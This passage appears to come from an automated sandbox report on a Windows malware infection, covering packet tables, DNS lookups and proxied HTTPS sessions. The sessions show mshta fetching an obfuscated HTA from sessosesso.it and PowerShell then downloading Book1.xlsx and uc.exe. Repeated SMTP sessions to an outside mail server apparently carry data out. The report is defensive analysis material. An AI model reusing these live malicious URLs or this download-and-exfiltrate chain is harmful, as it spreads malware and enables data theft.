                                                                                                                          Apr 24, 2024 06:45:32.146895885 CEST49715443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.146945000 CEST4434971513.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.146998882 CEST49715443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.169647932 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.169672966 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.169764996 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.172575951 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.172604084 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.702203989 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.702280045 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.704461098 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.704468012 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.704943895 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:32.749679089 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.780083895 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:32.820135117 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:33.421539068 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:33.421627998 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:33.421705961 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:33.425127029 CEST49716443192.168.2.713.107.139.11
                                                                                                                          Apr 24, 2024 06:45:33.425152063 CEST4434971613.107.139.11192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:42.800812006 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:42.998819113 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:42.998925924 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:43.317347050 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.321599007 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:43.519418955 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.519639015 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:43.718705893 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.777430058 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:43.990906000 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.990956068 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.990993023 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:43.991033077 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:44.018538952 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:44.216144085 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:44.228050947 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:44.425987005 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:44.429460049 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:44.628247023 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:44.629811049 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:44.867873907 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:44.929426908 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:44.929775953 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.127258062 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.127449989 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.127667904 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.365932941 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.376688957 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.376938105 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.574188948 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.574628115 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.575380087 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.575475931 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.575475931 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.575475931 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:45.773952007 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.774188995 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:45.774990082 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:46.002029896 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:46.198062897 CEST58749721192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:46.198143959 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:55.685764074 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:55.883317947 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:55.883415937 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.168767929 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.169078112 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.281182051 CEST49721587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.367539883 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.371162891 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.571888924 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.586164951 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.798649073 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798669100 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798686028 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:56.798763037 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.800883055 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:56.999397039 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.019771099 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.218019962 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.220863104 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.420227051 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.420819044 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.620695114 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.622181892 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:57.820223093 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:57.820528984 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.058994055 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.073995113 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.074249983 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.271661997 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.271716118 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.272418976 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275434017 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275510073 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.275510073 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:45:58.469975948 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.472726107 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.472783089 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.473804951 CEST58749722192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:58.532788038 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.132564068 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.329796076 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.330622911 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.476818085 CEST49722587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.610466003 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.611737967 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:07.809578896 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:07.809763908 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.009613037 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.050410032 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.263571978 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263592958 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263634920 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.263705015 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.268737078 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.467062950 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.490350962 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.688333988 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.689194918 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:08.887985945 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:08.888386011 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.089030027 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.090152979 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.287764072 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.287997007 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.525734901 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.538885117 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.539113998 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.736296892 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.736398935 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.737016916 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737098932 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737098932 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.737118006 CEST49723587192.168.2.7192.185.124.132
                                                                                                                          Apr 24, 2024 06:46:09.934755087 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.934777975 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.935269117 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:09.936124086 CEST58749723192.185.124.132192.168.2.7
                                                                                                                          Apr 24, 2024 06:46:10.146812916 CEST49723587192.168.2.7192.185.124.132

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Apr 24, 2024 06:45:17.126276970 CEST5849353192.168.2.71.1.1.1
                                                                                                                          Apr 24, 2024 06:45:17.757304907 CEST53584931.1.1.1192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:24.540235043 CEST6082953192.168.2.71.1.1.1
                                                                                                                          Apr 24, 2024 06:45:24.855134964 CEST53608291.1.1.1192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:31.982112885 CEST5058853192.168.2.71.1.1.1
                                                                                                                          Apr 24, 2024 06:45:33.428323984 CEST6014553192.168.2.71.1.1.1
                                                                                                                          Apr 24, 2024 06:45:42.232034922 CEST5018953192.168.2.71.1.1.1
                                                                                                                          Apr 24, 2024 06:45:42.785023928 CEST53501891.1.1.1192.168.2.7

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Apr 24, 2024 06:45:17.126276970 CEST192.168.2.71.1.1.10x221cStandard query (0)www.sessosesso.itA (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:24.540235043 CEST192.168.2.71.1.1.10xc5aStandard query (0)sessosesso.itA (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:31.982112885 CEST192.168.2.71.1.1.10x6832Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:33.428323984 CEST192.168.2.71.1.1.10xadf5Standard query (0)zyupsq.by.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:42.232034922 CEST192.168.2.71.1.1.10x5f0fStandard query (0)mail.irmaklarpaslanmaz.com.trA (IP address)IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Apr 24, 2024 06:45:17.757304907 CEST1.1.1.1192.168.2.70x221cNo error (0)www.sessosesso.it89.46.106.29A (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:24.855134964 CEST1.1.1.1192.168.2.70xc5aNo error (0)sessosesso.it89.46.106.29A (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:32.137315035 CEST1.1.1.1192.168.2.70x6832No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:32.137315035 CEST1.1.1.1192.168.2.70x6832No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:32.137315035 CEST1.1.1.1192.168.2.70x6832No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:32.137315035 CEST1.1.1.1192.168.2.70x6832No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:32.137315035 CEST1.1.1.1192.168.2.70x6832No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:33.641360044 CEST1.1.1.1192.168.2.70xadf5No error (0)zyupsq.by.files.1drv.comby-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:33.641360044 CEST1.1.1.1192.168.2.70xadf5No error (0)by-files.fe.1drv.comodc-by-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Apr 24, 2024 06:45:42.785023928 CEST1.1.1.1192.168.2.70x5f0fNo error (0)mail.irmaklarpaslanmaz.com.tr192.185.124.132A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • www.sessosesso.it
                                                                                                                          • sessosesso.it
                                                                                                                          • onedrive.live.com

                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.74970589.46.106.294437260C:\Windows\System32\mshta.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-24 04:45:18 UTC337OUTGET /assets/aw/yt.hta HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-CH
                                                                                                                          UA-CPU: AMD64
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                          Host: www.sessosesso.it
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-24 04:45:19 UTC226INHTTP/1.1 200 OK
                                                                                                                          Server: aruba-proxy
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:18 GMT
                                                                                                                          Content-Length: 78133
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Tue, 23 Apr 2024 08:57:08 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-ServerName: ipvsproxy74.ad.aruba.it
                                                                                                                          2024-04-24 04:45:19 UTC16158INData Raw: 97 ac ca b2 c3 22 c9 fe c3 4a 58 2d be 10 1e c8 d2 60 83 dd 2b 36 84 0a 43 8f cd 78 24 13 76 0e ac d6 f2 7a ac 52 d4 13 d9 80 9c d0 37 5e 83 94 f3 66 61 14 38 13 9f 60 27 c0 6f 33 55 50 da b0 d4 49 80 e7 1d a4 1c 80 8b 6f 04 ab 99 b4 d2 e4 0b 38 85 bd b1 62 d6 99 37 91 52 eb e2 a0 be 88 a5 ec fb ee de 9b 77 4f 4a e0 88 c8 0f f3 c6 73 ed 8a 28 1d cb 1d fe 72 73 e7 b0 8c 51 30 9d ea b1 7b 05 ad b8 e3 05 6f c1 35 72 d1 d9 0d 89 43 ca df fd 57 78 a1 bd 88 ee 89 7b f7 eb ea fd 1a 42 9e 17 94 ee 19 ba 09 85 b9 5b 95 aa 2c 98 65 5e 6d c1 72 32 46 72 10 bd 7c be 2f 68 0e 84 d6 38 58 8e 3a f6 f4 54 b0 24 f4 d2 bf 45 28 de c1 f0 15 99 7e 29 8a e8 fc 2c 06 d6 71 5b 8b a1 76 34 84 5c 52 9e 5e 6f 69 18 10 4d 3e 73 b2 ca 95 9e fc 3e 52 75 05 ad ad 6f 92 0e ef 1d e3 55
                                                                                                                          Data Ascii: "JX-`+6Cx$vzR7^fa8`'o3UPIo8b7RwOJs(rsQ0{o5rCWx{B[,e^mr2Fr|/h8X:T$E(~),q[v4\R^oiM>s>RuoU
                                                                                                                          2024-04-24 04:45:19 UTC16384INData Raw: 46 75 2c 77 57 2c 54 79 2c 64 4d 2c 46 63 2c 6c 55 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 46 75 2c 4c 67 2c 54 45 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 46 75 2c 4c 67 2c 64 4d 2c 54 79 2c 64 4d 2c 54 45 2c 55 69 2c 54 79 2c 46 75 2c 4b 42 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 54 45 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 46 75 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 64 4d 2c 55 69 2c 4c 67 2c 54 79 2c 64 4d 2c 77 57 2c 55 69 2c 54 79 2c 46 75 2c 64 4b 2c 4b 42 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 46 75 2c 6c 55 2c 64 4b 2c 54 79 2c 64 4d 2c 77 57 2c 77 57 2c 54 79 2c 64 4d 2c 77 57 2c 64 4d 2c 54 79 2c 46 75 2c 4b 42 2c 46 63 2c 54 79 2c 64 4d 2c 46 63 2c
                                                                                                                          Data Ascii: Fu,wW,Ty,dM,Fc,lU,Ty,Fu,KB,Fc,Ty,Fu,Lg,TE,Ty,dM,wW,Fu,Ty,Fu,Lg,dM,Ty,dM,TE,Ui,Ty,Fu,KB,Fu,Ty,dM,TE,TE,Ty,dM,wW,Fu,Ty,dM,TE,Fu,Ty,Fu,KB,Fc,Ty,dM,Ui,Lg,Ty,dM,wW,Ui,Ty,Fu,dK,KB,Ty,Fu,KB,Fc,Ty,Fu,KB,lU,Ty,Fu,lU,dK,Ty,dM,wW,wW,Ty,dM,wW,dM,Ty,Fu,KB,Fc,Ty,dM,Fc,
                                                                                                                          2024-04-24 04:45:19 UTC16384INData Raw: 75 2c 54 79 2c 64 4d 2c 54 45 2c 4c 67 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 46 75 2c 4c 67 2c 64 4d 2c 54 79 2c 46 75 2c 6c 55 2c 6c 55 2c 54 79 2c 46 75 2c 4c 67 2c 55 69 2c 54 79 2c 46 75 2c 4c 67 2c 46 75 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 64 4d 2c 64 4d 2c 46 63 2c 54 79 2c 64 4d 2c 77 57 2c 77 57 2c 54 79 2c 46 75 2c 4b 42 2c 55 69 2c 54 79 2c 46 75 2c 4b 42 2c 4c 67 2c 54 79 2c 46 75 2c 4b 42 2c 6c 55 2c 54 79 2c 46 75 2c 4c 67 2c 55 69 2c 54 79 2c 46 75 2c 6c 55 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 6c 55 2c 54 79 2c 64 4d 2c 46 63 2c 77 57 2c 54 79 2c 64 4d 2c 77 57 2c 46 75 2c 54 79 2c 64 4d 2c 54 45 2c 6c 55 2c 54 79 2c 64 4d 2c 46 63 2c 4b 42 2c 54 79 2c 46 75 2c 6c 55 2c 55 69 2c 54 79 2c 46 75 2c 6c 55 2c 46 75 2c 54
                                                                                                                          Data Ascii: u,Ty,dM,TE,Lg,Ty,dM,wW,Fu,Ty,Fu,Lg,dM,Ty,Fu,lU,lU,Ty,Fu,Lg,Ui,Ty,Fu,Lg,Fu,Ty,Fu,KB,lU,Ty,dM,dM,Fc,Ty,dM,wW,wW,Ty,Fu,KB,Ui,Ty,Fu,KB,Lg,Ty,Fu,KB,lU,Ty,Fu,Lg,Ui,Ty,Fu,lU,Fu,Ty,dM,TE,lU,Ty,dM,Fc,wW,Ty,dM,wW,Fu,Ty,dM,TE,lU,Ty,dM,Fc,KB,Ty,Fu,lU,Ui,Ty,Fu,lU,Fu,T
                                                                                                                          2024-04-24 04:45:19 UTC16384INData Raw: 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 66 61 69 6c 65 64 21 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 45 00 00 50 61 63 6b 61 67 65 52 65 67 69 73 74 72 61 74 69 6f 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 73 75 63 63 65 65 64 65 64 21 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 2a 00 00 43 61 6c 63 75 6c 61 74 6f 72 57 69 6e 4d 61 69 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 53 74 61 72 74 65 64 22 00 02 03 0b 05 00 00 00 00 00 00 00 02 00 44 00 00 50 61 63 6b 61 67 65 52 65 67 69 73 74 72 61 74 69 6f 6e 00 22 43 61 6c 63 75 6c 61 74 6f 72 20 70 61 63 6b 61 67 65 20 72 65 67 69 73 74 72 61 74 69 6f 6e 20 66 69 6e 69 73 68 65
                                                                                                                          Data Ascii: n"Calculator package verification failed!"EPackageRegistration"Calculator package verification succeeded!"*CalculatorWinMain"CalculatorStarted"DPackageRegistration"Calculator package registration finishe
                                                                                                                          2024-04-24 04:45:19 UTC12823INData Raw: 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 47 46 46 ff 47 47 47 ff 47 46 46 ff ff ff ff ff ff ff ff ff 46 46 46 ff 46 46 46 ff 47 46 46 ff 47 46 47 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff ff ff ff ff ff ff ff ff 47 47 47 ff 47 47 47 ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 46 46 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 47 47 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff 47 47 47 ff 47 47 47 ff 47 46 47 ff 46 46 46 ff 46 46 46 ff 46 46 46 ff ff ff ff ff ff ff ff ff 47 47 47 ff 46 46 46 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                          Data Ascii: FFGGGFFFFFFGFFGGGGFFFFFFFFGFFGFGFFFGGGFFFGFFGGGGGGGGGFFFGGGGGGGGGGGGGFFGGGGGGGGGGGGGGGGFGFFFFFFGGGFFFFFFGFFGGGGGGGFGGGGFFFFFFFFFGGGGGGGFGFFFFFFFFFGGGFFF


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.74971089.46.106.294437800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-24 04:45:25 UTC83OUTGET /assets/aw/Book1.xlsx HTTP/1.1
                                                                                                                          Host: sessosesso.it
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-24 04:45:26 UTC261INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: aruba-proxy
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:26 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: https://www.sessosesso.it/assets/aw/Book1.xlsx
                                                                                                                          X-ServerName: ipvsproxy74.ad.aruba.it
                                                                                                                          2024-04-24 04:45:26 UTC179INData Raw: 61 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: a8<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.74971389.46.106.294437800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-24 04:45:27 UTC83OUTGET /assets/aw/uc.exe HTTP/1.1
                                                                                                                          Host: www.sessosesso.it
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2024-04-24 04:45:28 UTC268INHTTP/1.1 200 OK
                                                                                                                          Server: aruba-proxy
                                                                                                                          Date: Wed, 24 Apr 2024 04:45:27 GMT
                                                                                                                          Content-Type: application/x-msdownload
